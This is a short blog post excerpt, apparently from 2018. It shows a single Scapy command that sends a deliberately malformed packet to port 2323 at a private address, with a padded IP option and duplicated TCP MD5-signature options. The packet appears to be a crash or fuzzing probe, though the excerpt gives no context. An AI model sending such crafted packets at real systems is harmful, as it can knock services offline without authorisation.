摘要: pip install scapy import scapy from scapy.all import * send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) 阅读全文
posted @ 2018-11-01 14:26 渐渐遗忘者 阅读(2391) 评论(0) 推荐(1) 编辑